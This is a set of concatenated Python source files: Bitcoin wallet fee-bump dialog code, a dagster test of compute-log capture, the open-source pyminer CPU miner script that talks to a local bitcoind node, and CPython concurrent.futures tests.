        "yourself, with a high fee. The goal is to have miners confirm "
        "the parent transaction in order to get the fee attached to the "
        "child transaction.")
    vbox.addWidget(WWLabel(_(msg)))
    msg2 = ("The proposed fee is computed using your "
        "fee/kB settings, applied to the total size of both child and "
        "parent transactions. After you broadcast a CPFP transaction, "
        "it is normal to see a new unconfirmed transaction in your history.")
    vbox.addWidget(WWLabel(_(msg2)))
    grid = QGridLayout()
    grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
    grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
    # The full value of the spent output is the hard upper bound on the fee.
    max_fee = new_tx.output_value()
    grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
    grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
    output_amount = QLabel('')
    grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
    grid.addWidget(output_amount, 2, 1)
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # FIXME with dyn fees, without estimates, there are all kinds of crashes here
    combined_fee = QLabel('')
    combined_feerate = QLabel('')
    def on_fee_edit(x):
        # Recompute the derived labels whenever the fee field changes.
        fee_for_child = fee_e.get_amount()
        if fee_for_child is None:
            return  # field empty/unparseable; keep the previous labels
        out_amt = max_fee - fee_for_child
        out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
        output_amount.setText(out_amt_str)
        comb_fee = parent_fee + fee_for_child
        comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
        combined_fee.setText(comb_fee_str)
        comb_feerate = comb_fee / total_size * 1000
        comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
        combined_feerate.setText(comb_feerate_str)
    fee_e.textChanged.connect(on_fee_edit)
    def get_child_fee_from_total_feerate(fee_per_kb):
        # Child pays whatever brings the combined (parent+child) package up
        # to fee_per_kb, clamped to [total_size, max_fee].
        fee = fee_per_kb * total_size / 1000 - parent_fee
        fee = min(max_fee, fee)
        fee = max(total_size, fee)  # pay at least 1 sat/byte for combined size
        return fee
    suggested_feerate = self.config.fee_per_kb()
    if suggested_feerate is None:
        self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
        return
    fee = get_child_fee_from_total_feerate(suggested_feerate)
    fee_e.setAmount(fee)
    grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
    grid.addWidget(fee_e, 3, 1)
    def on_rate(dyn, pos, fee_rate):
        fee = get_child_fee_from_total_feerate(fee_rate)
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    fee_slider.update()
    grid.addWidget(fee_slider, 4, 1)
    grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
    grid.addWidget(combined_fee, 5, 1)
    grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
    grid.addWidget(combined_feerate, 6, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    fee = fee_e.get_amount()
    if fee is None:
        return  # fee field left empty: treat as cancel
    if fee > max_fee:
        self.show_error(_('Max fee exceeded'))
        return
    new_tx = self.wallet.cpfp(parent_tx, fee)
    new_tx.set_rbf(True)
    self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
    """Show a Replace-By-Fee dialog for *tx* and, on confirmation, build and
    display the replacement transaction at the chosen fee rate.

    Fix: feerate_e.get_amount() returns None when the fee-rate field is
    empty or unparseable; the original passed None straight into
    wallet.bump_fee(). None is now treated as cancel.
    """
    fee = self.wallet.get_tx_fee(tx)
    if fee is None:
        self.show_error(_("Can't bump fee: unknown fee for original transaction."))
        return
    tx_label = self.wallet.get_label(tx.txid())
    tx_size = tx.estimated_size()
    old_fee_rate = fee / tx_size  # sat/vbyte
    d = WindowModalDialog(self, _('Bump Fee'))
    vbox = QVBoxLayout(d)
    vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
    vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
    vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
    vbox.addWidget(QLabel(_('New Fee rate') + ':'))
    def on_textedit_rate():
        # A manual edit takes priority over the slider.
        fee_slider.deactivate()
    feerate_e = FeerateEdit(lambda: 0)
    # Suggest a meaningfully higher rate: 1.5x, but at least +1 sat/vbyte.
    feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
    feerate_e.textEdited.connect(on_textedit_rate)
    vbox.addWidget(feerate_e)
    def on_slider_rate(dyn, pos, fee_rate):
        fee_slider.activate()
        if fee_rate is not None:
            feerate_e.setAmount(fee_rate / 1000)
    fee_slider = FeeSlider(self, self.config, on_slider_rate)
    fee_slider.deactivate()
    vbox.addWidget(fee_slider)
    cb = QCheckBox(_('Final'))
    vbox.addWidget(cb)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    is_final = cb.isChecked()
    new_fee_rate = feerate_e.get_amount()
    if new_fee_rate is None:
        return  # fee-rate field left empty: treat as cancel
    try:
        new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
    except CannotBumpFee as e:
        self.show_error(str(e))
        return
    if is_final:
        new_tx.set_rbf(False)
    self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
    """Add an offline transaction *tx* to the wallet history.

    Returns True on success; False if the transaction conflicts with the
    current history or the wallet rejects it (an error box is shown).
    """
    win = self.top_level_window()
    try:
        if not self.wallet.add_transaction(tx.txid(), tx):
            win.show_error(_("Transaction could not be saved.") + "\n" +
            _("It conflicts with current history."))
            return False
    except AddTransactionException as e:
        win.show_error(e)
        return False
    else:
        # Only persist and notify when add_transaction succeeded.
        self.wallet.storage.write()
        # need to update at least: history_list, utxo_list, address_list
        self.need_update.set()
        msg = (_("Transaction added to wallet history.") + '\n\n' +
        _("Note: this is an offline transaction, if you want the network "
        "to see it, you need to broadcast it."))
        win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
        return True
|
test_stdout.py | from __future__ import print_function
import os
import random
import string
import sys
import time
import pytest
from dagster import (
DagsterEventType,
InputDefinition,
ModeDefinition,
execute_pipeline,
pipeline,
reconstructable,
resource,
solid,
)
from dagster.core.execution.compute_logs import should_disable_io_stream_redirect
from dagster.core.instance import DagsterInstance
from dagster.core.storage.compute_log_manager import ComputeIOType
from dagster.core.test_utils import create_run_for_test
from dagster.seven import multiprocessing
HELLO_SOLID = "HELLO SOLID"  # stdout marker printed by the spew solid
HELLO_RESOURCE = "HELLO RESOURCE"  # stdout marker printed by resource_a
# os.linesep ("\r\n") only on Windows under Python 2; "\n" everywhere else.
# NOTE(review): SEPARATOR is not referenced anywhere in this chunk — confirm use.
SEPARATOR = os.linesep if (os.name == "nt" and sys.version_info < (3,)) else "\n"
@resource
def resource_a(_):
    """Dagster resource that prints the HELLO_RESOURCE marker and returns "A"."""
    print(HELLO_RESOURCE)
    return "A"
@solid
def spawn(_):
    """Solid that emits the integer 1 and prints nothing."""
    return 1
@solid(input_defs=[InputDefinition("num", int)], required_resource_keys={"a"})
def spew(_, num):
    """Solid that prints the HELLO_SOLID marker and passes *num* through."""
    print(HELLO_SOLID)
    return num
def define_pipeline():
    """Build a three-step pipeline (spawn -> spew -> spew) with resource "a"."""
    @pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
    def spew_pipeline():
        spew(spew(spawn()))
    return spew_pipeline
def normalize_file_content(s):
    """Normalize platform line endings to "\\n" and drop empty lines."""
    unified = s.replace(os.linesep, "\n")
    non_empty = []
    for line in unified.split("\n"):
        if line:
            non_empty.append(line)
    return "\n".join(non_empty)
@pytest.mark.skipif(
    should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk():
    """In-process run: each spew step's stdout must land in the local log file."""
    spew_pipeline = define_pipeline()
    instance = DagsterInstance.local_temp()
    manager = instance.compute_log_manager
    result = execute_pipeline(spew_pipeline, instance=instance)
    assert result.success
    # Step keys of every step that started during the run.
    compute_steps = [
        event.step_key
        for event in result.step_event_list
        if event.event_type == DagsterEventType.STEP_START
    ]
    for step_key in compute_steps:
        if step_key.startswith("spawn"):
            # spawn prints nothing; only the spew steps are checked.
            continue
        compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
        assert os.path.exists(compute_io_path)
        with open(compute_io_path, "r") as stdout_file:
            assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
    should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_to_disk_multiprocess():
    """Same as test_compute_log_to_disk, but with the multiprocess executor,
    so capture must also work across process boundaries."""
    # reconstructable is required so child processes can re-import the pipeline.
    spew_pipeline = reconstructable(define_pipeline)
    instance = DagsterInstance.local_temp()
    manager = instance.compute_log_manager
    result = execute_pipeline(
        spew_pipeline,
        run_config={"storage": {"filesystem": {}}, "execution": {"multiprocess": {}}},
        instance=instance,
    )
    assert result.success
    compute_steps = [
        event.step_key
        for event in result.step_event_list
        if event.event_type == DagsterEventType.STEP_START
    ]
    for step_key in compute_steps:
        if step_key.startswith("spawn"):
            # spawn prints nothing; only the spew steps are checked.
            continue
        compute_io_path = manager.get_local_path(result.run_id, step_key, ComputeIOType.STDOUT)
        assert os.path.exists(compute_io_path)
        with open(compute_io_path, "r") as stdout_file:
            assert normalize_file_content(stdout_file.read()) == HELLO_SOLID
@pytest.mark.skipif(
    should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager():
    """Read captured stdout/stderr back through the compute-log manager API."""
    instance = DagsterInstance.local_temp()
    manager = instance.compute_log_manager
    spew_pipeline = define_pipeline()
    result = execute_pipeline(spew_pipeline, instance=instance)
    assert result.success
    compute_steps = [
        event.step_key
        for event in result.step_event_list
        if event.event_type == DagsterEventType.STEP_START
    ]
    assert len(compute_steps) == 3
    step_key = "spew.compute"
    assert manager.is_watch_completed(result.run_id, step_key)
    stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
    assert normalize_file_content(stdout.data) == HELLO_SOLID
    stderr = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDERR)
    # Strip the ANSI color codes the dagster logger writes to stderr.
    cleaned_logs = stderr.data.replace("\x1b[34m", "").replace("\x1b[0m", "")
    assert "dagster - DEBUG - spew_pipeline - " in cleaned_logs
    # Unknown run ids must yield empty data rather than raising.
    bad_logs = manager.read_logs_file("not_a_run_id", step_key, ComputeIOType.STDOUT)
    assert bad_logs.data is None
    assert not manager.is_watch_completed("not_a_run_id", step_key)
@pytest.mark.skipif(
    should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_compute_log_manager_subscriptions():
    """Subscribing to a completed step's observables delivers one chunk each."""
    instance = DagsterInstance.local_temp()
    spew_pipeline = define_pipeline()
    step_key = "spew.compute"
    result = execute_pipeline(spew_pipeline, instance=instance)
    stdout_observable = instance.compute_log_manager.observable(
        result.run_id, step_key, ComputeIOType.STDOUT
    )
    stderr_observable = instance.compute_log_manager.observable(
        result.run_id, step_key, ComputeIOType.STDERR
    )
    stdout = []
    stdout_observable.subscribe(stdout.append)
    stderr = []
    stderr_observable.subscribe(stderr.append)
    assert len(stdout) == 1
    assert stdout[0].data.startswith(HELLO_SOLID)
    # Cursor is a byte offset: len(HELLO_SOLID) == 11 plus a 1- or 2-byte
    # line ending depending on platform.
    assert stdout[0].cursor in [12, 13]
    assert len(stderr) == 1
    # The stderr cursor points at the end of the delivered data.
    assert stderr[0].cursor == len(stderr[0].data)
    assert stderr[0].cursor > 400
def gen_solid_name(length):
    """Return a random solid name of *length* lowercase ASCII letters."""
    letters = []
    for _ in range(length):
        letters.append(random.choice(string.ascii_lowercase))
    return "".join(letters)
@pytest.mark.skipif(
    should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_long_solid_names():
    """Compute logs must still work when the solid name is very long
    (300 chars) — presumably guarding against filesystem name-length
    limits in the log path; confirm against the log manager implementation."""
    solid_name = gen_solid_name(300)

    @pipeline(mode_defs=[ModeDefinition(resource_defs={"a": resource_a})])
    def long_pipeline():
        spew.alias(name=solid_name)()

    instance = DagsterInstance.local_temp()
    manager = instance.compute_log_manager
    result = execute_pipeline(
        long_pipeline,
        instance=instance,
        run_config={"solids": {solid_name: {"inputs": {"num": 1}}}},
    )
    assert result.success
    compute_steps = [
        event.step_key
        for event in result.step_event_list
        if event.event_type == DagsterEventType.STEP_START
    ]
    assert len(compute_steps) == 1
    step_key = compute_steps[0]
    assert manager.is_watch_completed(result.run_id, step_key)
    stdout = manager.read_logs_file(result.run_id, step_key, ComputeIOType.STDOUT)
    assert normalize_file_content(stdout.data) == HELLO_SOLID
def execute_inner(step_key, pipeline_run, instance_ref):
    """Child-process entry point: rebuild the instance from its serializable
    ref, then run inner_step in this process."""
    instance = DagsterInstance.from_ref(instance_ref)
    inner_step(instance, pipeline_run, step_key)
def inner_step(instance, pipeline_run, step_key):
    """Print three numbered marker lines under the compute-log watch for
    *step_key*; captured output should equal expected_inner_output(step_key)."""
    with instance.compute_log_manager.watch(pipeline_run, step_key=step_key):
        # NOTE(review): the sleeps presumably give the watcher time to
        # attach and flush — confirm whether they are still needed.
        time.sleep(0.1)
        print(step_key, "inner 1")
        print(step_key, "inner 2")
        print(step_key, "inner 3")
        time.sleep(0.1)
def expected_inner_output(step_key):
    """Expected stdout for one inner step: three numbered marker lines."""
    lines = []
    for num in (1, 2, 3):
        lines.append("{step_key} inner {num}".format(step_key=step_key, num=num))
    return "\n".join(lines)
def expected_outer_prefix():
    """Expected leading stdout of the run-level capture: three outer lines."""
    lines = []
    for num in (1, 2, 3):
        lines.append("outer {num}".format(num=num))
    return "\n".join(lines)
@pytest.mark.skipif(
    should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_single():
    """Nested watch() scopes in one process: a run-level capture plus one
    per-step capture, each independently readable afterwards."""
    instance = DagsterInstance.local_temp()
    pipeline_name = "foo_pipeline"
    pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
    step_keys = ["A", "B", "C"]
    with instance.compute_log_manager.watch(pipeline_run):
        print("outer 1")
        print("outer 2")
        print("outer 3")
        for step_key in step_keys:
            inner_step(instance, pipeline_run, step_key)
    # Each step's capture contains only that step's marker lines.
    for step_key in step_keys:
        stdout = instance.compute_log_manager.read_logs_file(
            pipeline_run.run_id, step_key, ComputeIOType.STDOUT
        )
        assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
    # The run-level capture begins with the outer prints.
    full_out = instance.compute_log_manager.read_logs_file(
        pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
    )
    assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
@pytest.mark.skipif(
    should_disable_io_stream_redirect(), reason="compute logs disabled for win / py3.6+"
)
def test_multi():
    """Like test_single, but each inner step runs in its own child process."""
    instance = DagsterInstance.local_temp()
    pipeline_name = "foo_pipeline"
    pipeline_run = create_run_for_test(instance, pipeline_name=pipeline_name)
    step_keys = ["A", "B", "C"]
    with instance.compute_log_manager.watch(pipeline_run):
        print("outer 1")  # pylint: disable=print-call
        print("outer 2")  # pylint: disable=print-call
        print("outer 3")  # pylint: disable=print-call
        for step_key in step_keys:
            # One child process per step; join so captures complete in order.
            process = multiprocessing.Process(
                target=execute_inner, args=(step_key, pipeline_run, instance.get_ref())
            )
            process.start()
            process.join()
    for step_key in step_keys:
        stdout = instance.compute_log_manager.read_logs_file(
            pipeline_run.run_id, step_key, ComputeIOType.STDOUT
        )
        assert normalize_file_content(stdout.data) == expected_inner_output(step_key)
    full_out = instance.compute_log_manager.read_logs_file(
        pipeline_run.run_id, pipeline_name, ComputeIOType.STDOUT
    )
    # The way that the multiprocess compute-logging interacts with pytest (which stubs out the
    # sys.stdout fileno) makes this difficult to test. The pytest-captured stdout only captures
    # the stdout from the outer process, not also the inner process
    assert normalize_file_content(full_out.data).startswith(expected_outer_prefix())
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15  # seconds to back off after an error — presumably used by the mining loop (outside this view); confirm
MAX_NONCE = 1000000L  # nonces scanned per work unit (Python 2 long literal)
settings = {}  # runtime settings; populated elsewhere (not visible in this chunk) — TODO confirm source
pp = pprint.PrettyPrinter(indent=4)  # debug pretty-printer
class BitcoinRPC:
    """Minimal JSON-RPC 1.1 client over HTTP basic auth (legacy Python 2)."""
    # Starting request id; first use creates a per-instance counter.
    OBJID = 1
    def __init__(self, host, port, username, password):
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        # Non-strict connection with a 30 second timeout.
        self.conn = httplib.HTTPConnection(host, port, False, 30)
    def rpc(self, method, params=None):
        """Issue one JSON-RPC call.

        Returns the 'result' value, or None on transport/decode failure.
        NOTE(review): on an RPC error this *returns* resp_obj['error']
        (an object) rather than raising — callers must distinguish it
        from a genuine result; confirm intended.
        """
        # += on the class attribute creates/advances an instance attribute.
        self.OBJID += 1
        obj = { 'version' : '1.1',
        'method' : method,
        'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
        { 'Authorization' : self.authhdr,
        'Content-type' : 'application/json' })
        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None
        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        if 'error' in resp_obj and resp_obj['error'] != None:
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None
        return resp_obj['result']
    def getblockcount(self):
        # Current block height according to the node.
        return self.rpc('getblockcount')
    def getwork(self, data=None):
        # Without data: fetch new work; with data: presumably submit a
        # solution (standard getwork semantics) — confirm against the node.
        return self.rpc('getwork', data)
def uint32(x):
    # Truncate an arbitrary (long) integer to its low 32 bits.
    return x & 0xffffffffL
def bytereverse(x):
    # Reverse the byte order of a 32-bit word (endianness flip).
    return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
            (((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
    # Byte-swap each aligned 32-bit word of the buffer, preserving word
    # order.  struct.unpack raises if len(in_buf) is not a multiple of 4.
    out_words = []
    for i in range(0, len(in_buf), 4):
        word = struct.unpack('@I', in_buf[i:i+4])[0]
        out_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(out_words)
def wordreverse(in_buf):
    # Reverse the order of the 4-byte words in the buffer while leaving
    # the byte order inside each word untouched (a trailing partial word,
    # if any, is kept as-is, matching slice semantics).
    chunks = [in_buf[pos:pos + 4] for pos in range(0, len(in_buf), 4)]
    chunks.reverse()
    return ''.join(chunks)
class Miner:
    """One mining worker: fetch getwork, scan nonces, submit solutions.

    Python 2 only (str-as-bytes, .decode('hex'), xrange, long).
    """
    def __init__(self, id):
        # id: worker index, used only for hash-meter output.
        self.id = id
        # Per-round nonce scan limit; re-tuned each round in iterate().
        self.max_nonce = MAX_NONCE
    def work(self, datastr, targetstr):
        """Scan nonces against one getwork unit.

        Returns (hashes_done, nonce_bin) where nonce_bin is the packed
        winning nonce, or None if the scan finished without a solution.

        NOTE(review): if self.max_nonce is <= 0 the xrange loop body never
        runs and the final ``return (nonce + 1, None)`` raises
        UnboundLocalError -- confirm max_nonce is always kept positive.
        """
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)
        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]
        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]	# byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)
        # pre-hash first 76b of block header
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)
        for nonce in xrange(self.max_nonce):
            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)
            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()
            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()
            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue
            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)
            hash_str = hash.encode('hex')
            l = long(hash_str, 16)
            # proof-of-work test:  hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
                # A false positive keeps scanning; the return below is the
                # historical (disabled) early-exit.
                # return (nonce + 1, nonce_bin)
        return (nonce + 1, None)
    def submit_work(self, rpc, original_data, nonce_bin):
        """Splice the winning nonce into the work hex and submit upstream."""
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        # Bytes 76..80 of the 80-byte header = hex chars 152..160.
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result
    def iterate(self, rpc):
        """One fetch/scan/submit round; also re-tunes max_nonce."""
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return
        time_start = time.time()
        (hashes_done, nonce_bin) = self.work(work['data'],
                                             work['target'])
        time_end = time.time()
        time_diff = time_end - time_start
        # Aim for one round per settings['scantime'] seconds, clamped
        # below the 32-bit nonce space.
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL
        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                  self.id, hashes_done,
                  (hashes_done / 1000.0) / time_diff)
        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)
    def loop(self):
        """Run rounds forever against the configured bitcoind."""
        rpc = BitcoinRPC(settings['host'], settings['port'],
                 settings['rpcuser'], settings['rpcpass'])
        # NOTE(review): a constructor never returns None, so this guard is
        # dead code.
        if rpc is None:
            return
        while True:
            self.iterate(rpc)
def miner_thread(id):
    # Worker-process entry point: build a Miner for this worker id and run
    # its fetch/scan/submit loop forever.
    Miner(id).loop()
if __name__ == '__main__':
    # Entry point: parse a key=value config file, apply defaults, then fork
    # one mining process per configured thread.
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue
        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()
    # Fill in defaults for anything the config file omitted.
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 10820
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)
    # Config values arrive as strings; coerce the numeric ones.
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)			# stagger threads
    print settings['threads'], "mining threads started"
    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_concurrent_futures.py | import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more revelant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
test.support.import_module('threading')
from test.support.script_helper import assert_python_ok
import os
import sys
import threading
import time
import unittest
import weakref
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future)
from concurrent.futures.process import BrokenProcessPool
def create_future(state=PENDING, exception=None, result=None):
    """Return a Future forced directly into *state* with the given payload.

    Pokes the private fields rather than driving the real state machine;
    only suitable for building test fixtures.
    """
    future = Future()
    future._state = state
    future._exception = exception
    future._result = result
    return future
# Pre-built fixture futures, one per reachable Future state; shared across
# the test cases below, which must not mutate them.
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
    """Return x * y; a trivial picklable workload for the executor tests."""
    product = x * y
    return product
def sleep_and_raise(t):
    """Sleep *t* seconds, then raise a plain Exception (error-path fixture)."""
    time.sleep(t)
    raise Exception('this is an exception')
def sleep_and_print(t, msg):
    """Sleep *t* seconds, print *msg*, and flush so output survives atexit."""
    time.sleep(t)
    print(msg)
    sys.stdout.flush()
class MyObject(object):
    """Dummy object used to verify that executors drop task references."""
    def my_method(self):
        pass
class ExecutorMixin:
    """Shared setUp/tearDown harness; subclasses supply executor_type."""
    worker_count = 5
    def setUp(self):
        # Record start time so tearDown can flag runaway tests.
        self.t1 = time.time()
        try:
            self.executor = self.executor_type(max_workers=self.worker_count)
        except NotImplementedError as e:
            self.skipTest(str(e))
        self._prime_executor()
    def tearDown(self):
        self.executor.shutdown(wait=True)
        dt = time.time() - self.t1
        if test.support.verbose:
            print("%.2fs" % dt, end=' ')
        self.assertLess(dt, 60, "synchronization issue: test lasted too long")
    def _prime_executor(self):
        # Make sure that the executor is ready to do work before running the
        # tests. This should reduce the probability of timeouts in the tests.
        futures = [self.executor.submit(time.sleep, 0.1)
                   for _ in range(self.worker_count)]
        for f in futures:
            f.result()
class ThreadPoolMixin(ExecutorMixin):
    """Harness flavour that runs every shared test on a thread pool."""
    executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
    """Harness flavour that runs every shared test on a process pool."""
    executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest:
    """Shutdown behaviour shared by the thread- and process-pool suites."""
    def test_run_after_shutdown(self):
        # submit() after shutdown() must be rejected.
        self.executor.shutdown()
        self.assertRaises(RuntimeError,
                          self.executor.submit,
                          pow, 2, 5)
    def test_interpreter_shutdown(self):
        # Test the atexit hook for shutdown of worker threads and processes
        rc, out, err = assert_python_ok('-c', """if 1:
            from concurrent.futures import {executor_type}
            from time import sleep
            from test.test_concurrent_futures import sleep_and_print
            t = {executor_type}(5)
            t.submit(sleep_and_print, 1.0, "apple")
            """.format(executor_type=self.executor_type.__name__))
        # Errors in atexit hooks don't change the process exit code, check
        # stderr manually.
        self.assertFalse(err)
        self.assertEqual(out.strip(), b"apple")
    def test_hang_issue12364(self):
        # shutdown() with work still pending must not hang (issue #12364).
        fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
        self.executor.shutdown()
        for f in fs:
            f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, unittest.TestCase):
    """Thread-pool shutdown specifics: worker threads must terminate."""
    def _prime_executor(self):
        # Priming would spawn all workers up front, defeating the exact
        # thread-count assertion in test_threads_terminate.
        pass
    def test_threads_terminate(self):
        self.executor.submit(mul, 21, 2)
        self.executor.submit(mul, 6, 7)
        self.executor.submit(mul, 3, 14)
        self.assertEqual(len(self.executor._threads), 3)
        self.executor.shutdown()
        for t in self.executor._threads:
            t.join()
    def test_context_manager_shutdown(self):
        with futures.ThreadPoolExecutor(max_workers=5) as e:
            executor = e
            self.assertEqual(list(e.map(abs, range(-5, 5))),
                             [5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
        for t in executor._threads:
            t.join()
    def test_del_shutdown(self):
        # Dropping the last reference must still wind down the workers.
        executor = futures.ThreadPoolExecutor(max_workers=5)
        executor.map(abs, range(-5, 5))
        threads = executor._threads
        del executor
        for t in threads:
            t.join()
    def test_thread_names_assigned(self):
        executor = futures.ThreadPoolExecutor(
            max_workers=5, thread_name_prefix='SpecialPool')
        executor.map(abs, range(-5, 5))
        threads = executor._threads
        del executor
        for t in threads:
            self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
            t.join()
    def test_thread_names_default(self):
        executor = futures.ThreadPoolExecutor(max_workers=5)
        executor.map(abs, range(-5, 5))
        threads = executor._threads
        del executor
        for t in threads:
            # We don't particularly care what the default name is, just that
            # it has a default name implying that it is a ThreadPoolExecutor
            # followed by what looks like a thread number.
            self.assertRegex(t.name, r'^.*ThreadPoolExecutor.*_[0-4]$')
            t.join()
